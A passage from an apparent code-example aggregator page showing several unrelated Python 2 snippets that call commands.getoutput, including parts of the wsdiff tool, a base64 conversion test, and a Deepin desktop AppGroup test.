    myLcdManager.display(str(config['local']['controls'][ctrlid]['display']['pin']) + " (" + str(ctrlid) + ")", config['local']['controls'][ctrlid]['display']['width'], ctrlid)
    
#Main loop
while True:
    pass
Beispiel #57
0
def main():

    # Log file handle
    global log

    # Globals relating to command line options
    global logging, vdiffs, reportAllSects

    # Named temporary files / directories
    global tmpDir1, tmpDir2

    # Command paths
    global lintdump_cmd, elfdump_cmd, dump_cmd, dis_cmd, od_cmd, diff_cmd, sqlite_cmd

    # Default search path
    global wsdiff_path

    # Essentially "uname -p"
    global arch

    # changed files for worker thread processing
    global changedFiles
    global baseRoot
    global ptchRoot

    # Sort the list of files from a temporary file
    global sorted
    global differentFiles

    # Debugging indicator
    global debugon

    # Some globals need to be initialized
    debugon = logging = vdiffs = reportAllSects = sorted = False

    # Process command line arguments
    # Return values are returned from args() in alpha order
    # (Yes, python functions can return multiple values (ewww))
    # Note that args() also set the globals:
    #	logging to True if verbose logging (to a file) was enabled
    #	vdiffs to True if logged differences aren't to be truncated
    #	reportAllSects to True if all ELF section differences are to be reported
    #
    baseRoot, fileNamesFile, localTools, ptchRoot, results = args()

    #
    # Set up the results/log file
    #
    if logging:
        try:
            log = open(results, "w")
        except:
            logging = False
            error("failed to open log file: " + log)
            sys.exit(1)

        dateTimeStr = "# %04d-%02d-%02d at %02d:%02d:%02d" % time.localtime(
        )[:6]
        v_info("# This file was produced by wsdiff")
        v_info(dateTimeStr)

    # Changed files (used only for the sorted case)
    if sorted:
        differentFiles = []

    #
    # Build paths to the required tools
    #
    # Try to look for tools in $SRC/tools if the "-t" option
    # was specified
    #
    arch = commands.getoutput("uname -p")
    if localTools:
        try:
            src = os.environ['SRC']
        except:
            error("-t specified, but $SRC not set. Cannot find $SRC/tools")
            src = ""
        if len(src) > 0:
            wsdiff_path.insert(0, src + "/tools/proto/opt/onbld/bin")

    lintdump_cmd = find_tool("lintdump")
    elfdump_cmd = find_tool("elfdump")
    dump_cmd = find_tool("dump")
    od_cmd = find_tool("od")
    dis_cmd = find_tool("dis")
    diff_cmd = find_tool("diff")
    sqlite_cmd = find_tool("sqlite")

    #
    # Set resource limit for number of open files as high as possible.
    # This might get handy with big number of threads.
    #
    (nofile_soft, nofile_hard) = resource.getrlimit(resource.RLIMIT_NOFILE)
    try:
        resource.setrlimit(resource.RLIMIT_NOFILE, (nofile_hard, nofile_hard))
    except:
        error("cannot set resource limits for number of open files")
        sys.exit(1)

    #
    # validate the base and patch paths
    #
    if baseRoot[-1] != '/':
        baseRoot += '/'

    if ptchRoot[-1] != '/':
        ptchRoot += '/'

    if not os.path.exists(baseRoot):
        error("old proto area: " + baseRoot + " does not exist")
        sys.exit(1)

    if not os.path.exists(ptchRoot):
        error("new proto area: " + ptchRoot + \
              " does not exist")
        sys.exit(1)

    #
    # log some information identifying the run
    #
    v_info("Old proto area: " + baseRoot)
    v_info("New proto area: " + ptchRoot)
    v_info("Results file: " + results + "\n")

    #
    # Set up the temporary directories / files
    # Could use python's tmpdir routines, but these should
    # be easier to identify / keep around for debugging
    pid = os.getpid()
    tmpDir1 = "/tmp/wsdiff_tmp1_" + str(pid) + "/"
    tmpDir2 = "/tmp/wsdiff_tmp2_" + str(pid) + "/"
    try:
        os.makedirs(tmpDir1)
    except OSError, e:
        error("main: makedir failed %s" % e)
Beispiel #58
0
def copy_file(x, y):
    print "should copy"
    commands.getoutput("cp /data/sep/bob/test/data.big.json.dat /data/sep/bob/test/data.big.%d.%d.json.dat" % (x, y))
Beispiel #59
0
if __name__=="__main__":
    doc=os.path.basename(sys.argv[0])+""" base64Converter.x
    This script tests the conversion of reals to base64.
    You have to give the executable obtained by compiling convertBase64.F90
    as argument to this script"""

    numDataRe=re.compile(" *digits *(?P<digits>[0-9]+) *maxexp *(?P<maxexp>[0-9]+) *minexp *(?P<minexp>-[0-9]+) *radix *(?P<radix>[0-9]+)")

    if len(sys.argv)!=2:
        print doc
        sys.exit(1)
    conv_exe=sys.argv[1]
    logFile=sys.stdout
    print 20*"="+ " converter self tests results "+20*"="
    r=commands.getoutput(conv_exe)
    print r
    d=filter(lambda x:numDataRe.match(x),r.splitlines())
    if d:
        m=numDataRe.match(d[0])
        # failures in the denormalized range deemed not important
        small=float(m.group("radix"))**(int(m.group("minexp"))+int(m.group("digits"))-1)
    else:
        small=0.5**(-1021)
    print 60*"="

    for fname in ['ref_32','ref_64','normalNrs']:
        print "** convert",fname,"**"
        diff=testB64(fname,logFile,small)

    print "\n======== ERROR:",diff,"=========\n"
    def testAppGroup(self):

        # send deepin-feedback, deepin-movie, and eog to the desktop
        feedback = self.session_if2.RequestSendToDesktop('deepin-feedback')
        time.sleep(5)
        self.assertTrue(feedback)

        movie = self.session_if2.RequestSendToDesktop('deepin-movie')
        time.sleep(5)
        self.assertTrue(movie)

        eog = self.session_if2.RequestSendToDesktop('eog')
        time.sleep(5)
        self.assertTrue(eog)
        # drag deepin-feedback onto deepin-movie
        creatappgroup = self.session_if.RequestCreatingAppGroup((self.user_desktop_dir+"/deepin-feedback.desktop",\
         self.user_desktop_dir+"/deepin-movie.desktop"))
        self.assertIsNone(creatappgroup)
        time.sleep(5)

        # get the AppGroup directory name from the desktop listing
        self.user_desktop_appgroup = commands.getoutput(
            "bash -c 'source ~/.config/user-dirs.dirs "
            "&& ls -ahl $XDG_DESKTOP_DIR | grep .deepin_rich_dir_'"
        ).decode("utf-8").split("\n")
        self.user_desktop_appgroup = [
            n for n in self.user_desktop_appgroup if len(n.strip()) > 0
        ]
        self.user_desktop_appgroup = "".join(self.user_desktop_appgroup)
        self.user_desktop_appgroup = str(self.user_desktop_appgroup).replace(
            'u\'', '\'').decode("unicode-escape")
        print self.user_desktop_appgroup
        self.user_desktop_appgroup = self.user_desktop_appgroup.split(
            "  ")[1].split(" ")[7:]
        self.user_desktop_appgroup = " ".join(self.user_desktop_appgroup)
        self.user_desktop_appgroup = str(self.user_desktop_appgroup).replace(
            'u\'', '\'').decode("unicode-escape")
        print "AppGroup name is:%s\n" % self.user_desktop_appgroup
        #merge eog into AppGroup
        self.appgroup_dir = "%s/%s" % (self.user_desktop_dir,
                                       self.user_desktop_appgroup)
        print "appgroup_dir is:%s\n" % self.appgroup_dir
        mergeappgroup = self.session_if.RequestMergeIntoAppGroup(
            (self.user_desktop_dir + "/eog.desktop", self.appgroup_dir),
            self.appgroup_dir)
        self.assertIsNone(mergeappgroup)
        time.sleep(5)

        IsAppGroup = self.session_if.IsAppGroup(self.user_desktop_appgroup)
        print "%s is AppGroup: %d " % (self.user_desktop_appgroup, IsAppGroup)

        GetDesktopItems = self.session_if.GetDesktopItems()
        print "GetDesktopItems----------------------\n"
        print json.dumps(GetDesktopItems, indent=4, ensure_ascii=False)

        GetAppGroupItems = self.session_if.GetAppGroupItems(self.appgroup_dir)
        print "GetAppGroupItems----------------------\n"
        print json.dumps(GetAppGroupItems, indent=4, ensure_ascii=False)

        GetItemInfo = self.session_if.GetItemInfo(self.appgroup_dir)
        print "GetItemInfo----------------------\n"
        print json.dumps(GetItemInfo, indent=4, ensure_ascii=False)